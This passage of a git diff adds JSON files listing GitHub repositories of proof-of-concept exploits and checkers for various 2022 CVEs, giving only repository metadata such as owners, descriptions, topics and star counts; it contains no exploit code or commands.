"Haxatron\/CVE-2022-0219", + "owner": { + "login": "Haxatron", + "id": 76475453, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76475453?v=4", + "html_url": "https:\/\/github.com\/Haxatron", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Haxatron\/CVE-2022-0219", + "description": null, + "fork": false, + "created_at": "2022-01-20T14:24:45Z", + "updated_at": "2022-01-20T14:24:45Z", + "pushed_at": "2022-01-20T14:35:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0236.json b/2022/CVE-2022-0236.json new file mode 100644 index 0000000000..5330ab9766 --- /dev/null +++ b/2022/CVE-2022-0236.json @@ -0,0 +1,66 @@ +[ + { + "id": 448514056, + "name": "CVE-2022-0236", + "full_name": "qurbat\/CVE-2022-0236", + "owner": { + "login": "qurbat", + "id": 37518297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37518297?v=4", + "html_url": "https:\/\/github.com\/qurbat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qurbat\/CVE-2022-0236", + "description": "Proof of concept for unauthenticated sensitive data disclosure affecting the wp-import-export WordPress plugin (CVE-2022-0236)", + "fork": false, + "created_at": "2022-01-16T09:52:28Z", + "updated_at": "2023-01-28T03:56:57Z", + "pushed_at": "2022-01-18T17:14:53Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "wordpress-security" + ], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 448893968, + "name": "CVE-2022-0236", + "full_name": "xiska62314\/CVE-2022-0236", + "owner": { + "login": "xiska62314", + "id": 97891523, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97891523?v=4", + "html_url": "https:\/\/github.com\/xiska62314", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xiska62314\/CVE-2022-0236", + "description": "CVE-2022-0236", + "fork": false, + "created_at": "2022-01-17T12:56:19Z", + "updated_at": "2022-01-17T12:56:19Z", + "pushed_at": "2022-01-17T12:56:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0265.json b/2022/CVE-2022-0265.json new file mode 100644 index 0000000000..f20cec5c9b --- /dev/null +++ b/2022/CVE-2022-0265.json @@ -0,0 +1,33 @@ +[ + { + "id": 483967422, + "name": "CVE-2022-0265", + "full_name": "achuna33\/CVE-2022-0265", + "owner": { + "login": "achuna33", + "id": 48993128, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48993128?v=4", + "html_url": "https:\/\/github.com\/achuna33", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/achuna33\/CVE-2022-0265", + "description": null, + "fork": false, + "created_at": "2022-04-21T08:24:26Z", + "updated_at": "2023-07-06T21:38:49Z", + "pushed_at": "2022-04-21T08:29:05Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0316.json b/2022/CVE-2022-0316.json new file mode 100644 index 0000000000..9b933e368c --- /dev/null +++ b/2022/CVE-2022-0316.json @@ -0,0 +1,42 @@ +[ + { + "id": 599217584, + "name": "CVE-2022-0316_wordpress_multiple_themes_exploit", + "full_name": "KTN1990\/CVE-2022-0316_wordpress_multiple_themes_exploit", + "owner": { + "login": "KTN1990", + "id": 33407405, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33407405?v=4", + "html_url": "https:\/\/github.com\/KTN1990", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KTN1990\/CVE-2022-0316_wordpress_multiple_themes_exploit", + "description": "( Wordpress Exploit ) Wordpress Multiple themes - Unauthenticated Arbitrary File Upload", + "fork": false, + "created_at": "2023-02-08T17:37:09Z", + "updated_at": "2024-09-05T09:11:44Z", + "pushed_at": "2023-02-09T15:59:30Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bot", + "botnet", + "exploit", + "hack", + "hacking", + "pentest", + "pentest-tool", + "shell" + ], + "visibility": "public", + "forks": 5, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0332.json b/2022/CVE-2022-0332.json new file mode 100644 index 0000000000..303a00cb76 --- /dev/null +++ b/2022/CVE-2022-0332.json @@ -0,0 +1,33 @@ +[ + { + "id": 452082369, + "name": "CVE-2022-0332", + "full_name": "numanturle\/CVE-2022-0332", + "owner": { + "login": "numanturle", + "id": 7007951, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7007951?v=4", + "html_url": "https:\/\/github.com\/numanturle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/numanturle\/CVE-2022-0332", + "description": null, + "fork": false, + "created_at": "2022-01-25T23:58:17Z", + "updated_at": "2024-08-12T20:20:04Z", + "pushed_at": "2022-01-26T00:18:26Z", + "stargazers_count": 44, + "watchers_count": 44, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 44, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0337.json b/2022/CVE-2022-0337.json new file mode 100644 index 0000000000..59943fe954 --- /dev/null +++ b/2022/CVE-2022-0337.json @@ -0,0 +1,111 @@ +[ + { + "id": 471632445, + "name": "CVE-2022-0337-PoC-Google-Chrome-Microsoft-Edge-Opera", + "full_name": "Puliczek\/CVE-2022-0337-PoC-Google-Chrome-Microsoft-Edge-Opera", + "owner": { + "login": "Puliczek", + "id": 12344862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12344862?v=4", + "html_url": "https:\/\/github.com\/Puliczek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Puliczek\/CVE-2022-0337-PoC-Google-Chrome-Microsoft-Edge-Opera", + "description": "🎩 🤟🏻 [P1-$10,000] Google Chrome, Microsoft Edge and Opera - vulnerability reported by Maciej Pulikowski - System environment variables leak - CVE-2022-0337", + "fork": false, + "created_at": "2022-03-19T08:10:46Z", + "updated_at": "2024-10-31T16:32:16Z", + "pushed_at": "2022-09-04T17:28:56Z", + "stargazers_count": 328, + "watchers_count": 328, + "has_discussions": false, + "forks_count": 34, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "bugbounty-writeups", + "bugbountytips", + "cve", + "cve-2022-0337", + "cybersecurity", + "exploit", + "hacking", + "payload", + "pentest", + "pentesting", + "red-team", + "security", + "security-writeups", + "writeups" + ], + "visibility": "public", + "forks": 34, + "watchers": 328, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 608127887, + "name": "ChExp-CVE-2022-0337-", + "full_name": "maldev866\/ChExp-CVE-2022-0337-", + "owner": { + "login": "maldev866", + "id": 118355132, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118355132?v=4", + "html_url": "https:\/\/github.com\/maldev866", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maldev866\/ChExp-CVE-2022-0337-", + "description": null, + "fork": false, + "created_at": "2023-03-01T11:31:45Z", + "updated_at": "2023-03-01T11:33:31Z", + "pushed_at": "2023-03-01T11:33:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 721416376, + "name": "CVE-2022-0337-RePoC", + "full_name": "zer0ne1\/CVE-2022-0337-RePoC", + "owner": { + "login": "zer0ne1", + "id": 71746399, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71746399?v=4", + "html_url": "https:\/\/github.com\/zer0ne1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zer0ne1\/CVE-2022-0337-RePoC", + "description": null, + "fork": false, + "created_at": "2023-11-21T02:34:32Z", + "updated_at": "2023-11-21T02:36:09Z", + "pushed_at": "2023-12-12T02:42:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0412.json b/2022/CVE-2022-0412.json new file mode 100644 index 0000000000..c80614f384 --- /dev/null +++ b/2022/CVE-2022-0412.json @@ -0,0 +1,38 @@ +[ + { + "id": 683124631, + "name": "CVE-2022-0412_Exploit", + "full_name": "TcherB31\/CVE-2022-0412_Exploit", + "owner": { + "login": "TcherB31", + "id": 108927927, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108927927?v=4", + "html_url": "https:\/\/github.com\/TcherB31", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TcherB31\/CVE-2022-0412_Exploit", + "description": "I'm write a exploit&scan for exploitation SQL Injection in WP from CVE-2022-0412", + "fork": false, + "created_at": "2023-08-25T16:54:28Z", + "updated_at": "2024-11-02T10:19:04Z", + "pushed_at": "2023-08-25T16:56:38Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "poc", + "sqlinjection", + "wordpess" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0435.json b/2022/CVE-2022-0435.json new file mode 100644 index 0000000000..5eb9ba25a8 --- /dev/null +++ b/2022/CVE-2022-0435.json @@ -0,0 +1,33 @@ +[ + { + "id": 630581068, + "name": "CVE-2022-0435", + "full_name": "wlswotmd\/CVE-2022-0435", + "owner": { + "login": "wlswotmd", + "id": 80761172, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80761172?v=4", + "html_url": "https:\/\/github.com\/wlswotmd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wlswotmd\/CVE-2022-0435", + "description": null, + "fork": false, + "created_at": "2023-04-20T17:29:02Z", + "updated_at": "2023-07-03T13:45:44Z", + "pushed_at": "2023-04-26T09:45:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0439.json b/2022/CVE-2022-0439.json new file mode 100644 index 0000000000..98c9265cc3 --- /dev/null +++ b/2022/CVE-2022-0439.json @@ -0,0 +1,33 @@ +[ + { + "id": 651257016, + "name": "CVE-2022-0439", + "full_name": "RandomRobbieBF\/CVE-2022-0439", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2022-0439", + "description": "CVE-2022-0439 - Email Subscribers & Newsletters < 5.3.2 - Subscriber+ Blind SQL injection", + "fork": false, + "created_at": "2023-06-08T21:20:22Z", + "updated_at": "2023-06-09T07:40:58Z", + "pushed_at": "2023-06-08T21:26:58Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0441.json b/2022/CVE-2022-0441.json new file mode 100644 index 0000000000..ce279caefc --- /dev/null +++ b/2022/CVE-2022-0441.json @@ -0,0 +1,136 @@ +[ + { + "id": 489443379, + "name": "CVE-2022-0441", + "full_name": "biulove0x\/CVE-2022-0441", + "owner": { + "login": "biulove0x", + "id": 105073212, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105073212?v=4", + "html_url": "https:\/\/github.com\/biulove0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/biulove0x\/CVE-2022-0441", + "description": "WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation", + "fork": false, + "created_at": "2022-05-06T17:40:55Z", + "updated_at": "2023-03-13T18:58:34Z", + "pushed_at": "2022-06-26T14:13:28Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-0441", + "python3", + "vulnerabilities", + "wordpress", + "wordpress-plugin" + ], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 567613523, + "name": "cve-2022-0441", + "full_name": "SDragon1205\/cve-2022-0441", + "owner": { + "login": "SDragon1205", + "id": 80585189, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80585189?v=4", + "html_url": "https:\/\/github.com\/SDragon1205", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SDragon1205\/cve-2022-0441", + "description": "CVE-2022-0441 - MasterStudy LMS 2.7.6", + "fork": false, + "created_at": "2022-11-18T07:02:29Z", + "updated_at": "2022-11-20T12:52:35Z", + "pushed_at": "2022-11-18T07:07:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 648445645, + "name": "CVE-2022-0441", + "full_name": "tegal1337\/CVE-2022-0441", + "owner": { + "login": "tegal1337", + "id": 58784189, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58784189?v=4", + "html_url": "https:\/\/github.com\/tegal1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tegal1337\/CVE-2022-0441", + "description": "The MasterStudy LMS WordPress plugin before 2.7.6 does to validate some parameters given when registering a new account, allowing unauthenticated users to register as an admin", + "fork": false, + "created_at": "2023-06-02T01:53:32Z", + "updated_at": "2024-08-12T20:31:34Z", + "pushed_at": "2023-06-02T02:24:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-0441", + "wordpress-exploit", + "wordpress-plugin" + ], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 699704500, + "name": "CVE-2022-0441", + "full_name": "kyukazamiqq\/CVE-2022-0441", + "owner": { + "login": "kyukazamiqq", + "id": 55656379, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55656379?v=4", + "html_url": "https:\/\/github.com\/kyukazamiqq", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kyukazamiqq\/CVE-2022-0441", + "description": "Checker for CVE-2022-0441", + "fork": false, + "created_at": "2023-10-03T07:07:40Z", + "updated_at": "2023-10-03T07:09:30Z", + "pushed_at": "2023-10-03T07:09:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0482.json b/2022/CVE-2022-0482.json new file mode 100644 index 0000000000..3bca6fcc37 --- /dev/null +++ b/2022/CVE-2022-0482.json @@ -0,0 +1,70 @@ +[ + { + "id": 481143929, + "name": "exploit-CVE-2022-0482", + "full_name": "Acceis\/exploit-CVE-2022-0482", + "owner": { + "login": "Acceis", + "id": 34159431, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34159431?v=4", + "html_url": "https:\/\/github.com\/Acceis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Acceis\/exploit-CVE-2022-0482", + "description": "Easy!Appointments < 1.4.3 - Unauthenticated PII (events) disclosure", + "fork": false, + "created_at": "2022-04-13T09:00:44Z", + "updated_at": "2022-11-09T18:15:43Z", + "pushed_at": "2022-05-27T08:20:23Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-0482", + "disclosure", + "exploit", + "pii" + ], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 790152234, + "name": "CVE-2022-0482_exploit", + "full_name": "mija-pilkaite\/CVE-2022-0482_exploit", + "owner": { + "login": "mija-pilkaite", + "id": 115141099, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115141099?v=4", + "html_url": "https:\/\/github.com\/mija-pilkaite", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mija-pilkaite\/CVE-2022-0482_exploit", + "description": "A final project for \"Network Security\" class at NYCU (National Yang Ming Chiao Tung University, Taiwan). Exploiting a CVE in \"EasyAppointments\" software. ", + "fork": false, + "created_at": "2024-04-22T11:10:33Z", + "updated_at": "2024-05-11T09:48:18Z", + "pushed_at": "2024-04-22T12:09:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0486.json b/2022/CVE-2022-0486.json new file mode 100644 index 0000000000..1ab4f1c06e --- /dev/null +++ b/2022/CVE-2022-0486.json @@ -0,0 +1,33 @@ +[ + { + "id": 499386073, + "name": "CVE-2022-0486", + "full_name": "henryreed\/CVE-2022-0486", + "owner": { + "login": "henryreed", + "id": 60915078, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60915078?v=4", + "html_url": "https:\/\/github.com\/henryreed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/henryreed\/CVE-2022-0486", + "description": "Fidelis Network and Deception - Insecure File Permissions Privilege Escalation - Multiple", + "fork": false, + "created_at": "2022-06-03T05:06:52Z", + "updated_at": "2022-06-03T05:24:37Z", + "pushed_at": "2022-06-03T06:56:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0492.json b/2022/CVE-2022-0492.json new file mode 100644 index 0000000000..cd96d3e059 --- /dev/null +++ b/2022/CVE-2022-0492.json @@ -0,0 +1,226 @@ +[ + { + "id": 464299568, + "name": "can-ctr-escape-cve-2022-0492", + "full_name": "PaloAltoNetworks\/can-ctr-escape-cve-2022-0492", + "owner": { + "login": "PaloAltoNetworks", + "id": 4855743, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4855743?v=4", + "html_url": "https:\/\/github.com\/PaloAltoNetworks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PaloAltoNetworks\/can-ctr-escape-cve-2022-0492", + "description": "Test whether a container environment is vulnerable to container escapes via CVE-2022-0492", + "fork": false, + "created_at": "2022-02-28T01:25:26Z", + "updated_at": "2024-11-05T04:01:34Z", + "pushed_at": "2022-03-09T00:09:46Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 47, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 466710055, + "name": "CVE-2022-0492-Checker", + "full_name": "SofianeHamlaoui\/CVE-2022-0492-Checker", + "owner": { + "login": "SofianeHamlaoui", + "id": 16967174, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16967174?v=4", + "html_url": "https:\/\/github.com\/SofianeHamlaoui", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SofianeHamlaoui\/CVE-2022-0492-Checker", + "description": "A script to check if a container environment is vulnerable to container escapes via CVE-2022-0492", + "fork": false, + "created_at": "2022-03-06T10:57:09Z", + "updated_at": "2024-08-12T20:21:17Z", + "pushed_at": "2022-03-12T13:45:32Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 9, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 468660841, + "name": "CVE-2022-0492", + "full_name": "chenaotian\/CVE-2022-0492", + "owner": { + "login": "chenaotian", + "id": 86546351, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86546351?v=4", + "html_url": "https:\/\/github.com\/chenaotian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chenaotian\/CVE-2022-0492", + "description": "CVE-2022-0492 EXP and Analysis write up", + "fork": false, + "created_at": "2022-03-11T08:02:46Z", + "updated_at": "2024-08-12T20:21:27Z", + "pushed_at": "2022-03-11T09:33:24Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 28, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 471620496, + "name": "CVE-2022-0492", + "full_name": "bb33bb\/CVE-2022-0492", + "owner": { + "login": "bb33bb", + "id": 5463104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5463104?v=4", + "html_url": "https:\/\/github.com\/bb33bb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bb33bb\/CVE-2022-0492", + "description": null, + "fork": false, + "created_at": "2022-03-19T07:13:56Z", + "updated_at": "2023-12-23T11:27:56Z", + "pushed_at": "2022-03-07T10:03:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 490291933, + "name": "device_renesas_kernel_AOSP10_r33_CVE-2022-0492", + "full_name": "Trinadh465\/device_renesas_kernel_AOSP10_r33_CVE-2022-0492", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/device_renesas_kernel_AOSP10_r33_CVE-2022-0492", + "description": null, + "fork": false, + "created_at": "2022-05-09T13:20:03Z", + "updated_at": "2023-03-10T01:12:55Z", + "pushed_at": "2022-05-09T13:23:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 529476500, + "name": "CVE-2022-0492-Container-Escape", + "full_name": "yoeelingBin\/CVE-2022-0492-Container-Escape", + "owner": { + "login": "yoeelingBin", + "id": 57822313, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57822313?v=4", + "html_url": "https:\/\/github.com\/yoeelingBin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yoeelingBin\/CVE-2022-0492-Container-Escape", + "description": "CVE-2022-0492-Container-Escape", + "fork": false, + "created_at": "2022-08-27T04:02:24Z", + "updated_at": "2022-09-16T14:15:14Z", + "pushed_at": "2022-08-28T08:19:56Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 603301567, + "name": "CVE-2022-0492-Docker-Breakout-Checker-and-PoC", + "full_name": "T1erno\/CVE-2022-0492-Docker-Breakout-Checker-and-PoC", + "owner": { + "login": "T1erno", + "id": 78065668, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78065668?v=4", + "html_url": "https:\/\/github.com\/T1erno", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/T1erno\/CVE-2022-0492-Docker-Breakout-Checker-and-PoC", + "description": "Docker Breakout Checker and PoC via CAP_SYS_ADMIN and via user namespaces (CVE-2022-0492)", + "fork": false, + "created_at": "2023-02-18T04:48:25Z", + "updated_at": "2024-10-21T18:51:59Z", + "pushed_at": "2023-02-18T05:28:02Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-0492", + "docker-breakout", + "hacking", + "pentesting", + "privesc" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0529.json b/2022/CVE-2022-0529.json new file mode 100644 index 0000000000..6d7f395cc1 --- /dev/null +++ b/2022/CVE-2022-0529.json @@ -0,0 +1,64 @@ +[ + { + "id": 464348331, + "name": "unzip_poc", + "full_name": "nanaao\/unzip_poc", + "owner": { + "login": "nanaao", + "id": 77666853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77666853?v=4", + "html_url": "https:\/\/github.com\/nanaao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanaao\/unzip_poc", + "description": "CVE-2022-0529 & CVE-2022-0530", + "fork": false, + "created_at": "2022-02-28T05:20:03Z", + "updated_at": "2024-08-12T20:21:04Z", + "pushed_at": "2022-02-28T05:10:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 464353991, + "name": "unzip_poc", + "full_name": "ByteHackr\/unzip_poc", + "owner": { + "login": "ByteHackr", + "id": 30409831, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30409831?v=4", + "html_url": "https:\/\/github.com\/ByteHackr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ByteHackr\/unzip_poc", + "description": "CVE-2022-0529 & CVE-2022-0530", + "fork": false, + "created_at": "2022-02-28T05:44:52Z", + "updated_at": "2024-08-12T20:21:04Z", + "pushed_at": "2022-02-28T06:01:08Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0540.json b/2022/CVE-2022-0540.json new file mode 100644 index 0000000000..c6dd1d1e56 --- /dev/null +++ b/2022/CVE-2022-0540.json @@ -0,0 +1,36 @@ +[ + { + "id": 496189350, + "name": "CVE-2022-0540-RCE", + "full_name": "Pear1y\/CVE-2022-0540-RCE", + "owner": { + "login": "Pear1y", + "id": 47770089, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47770089?v=4", + "html_url": "https:\/\/github.com\/Pear1y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pear1y\/CVE-2022-0540-RCE", + "description": "Atlassian Jira Seraph Authentication Bypass RCE(CVE-2022-0540)", + "fork": false, + "created_at": "2022-05-25T10:47:04Z", + "updated_at": "2024-08-12T20:23:33Z", + "pushed_at": "2022-05-25T13:43:16Z", + "stargazers_count": 69, + "watchers_count": 69, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-0540", + "exploit" + ], + "visibility": "public", + "forks": 16, + "watchers": 69, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0543.json b/2022/CVE-2022-0543.json new file mode 100644 index 0000000000..2ff4d85e4b --- /dev/null +++ b/2022/CVE-2022-0543.json @@ -0,0 +1,126 @@ +[ + { + "id": 470463288, + "name": "CVE-2022-0543", + "full_name": "0x7eTeam\/CVE-2022-0543", + "owner": { + "login": "0x7eTeam", + "id": 96908273, + "avatar_url": 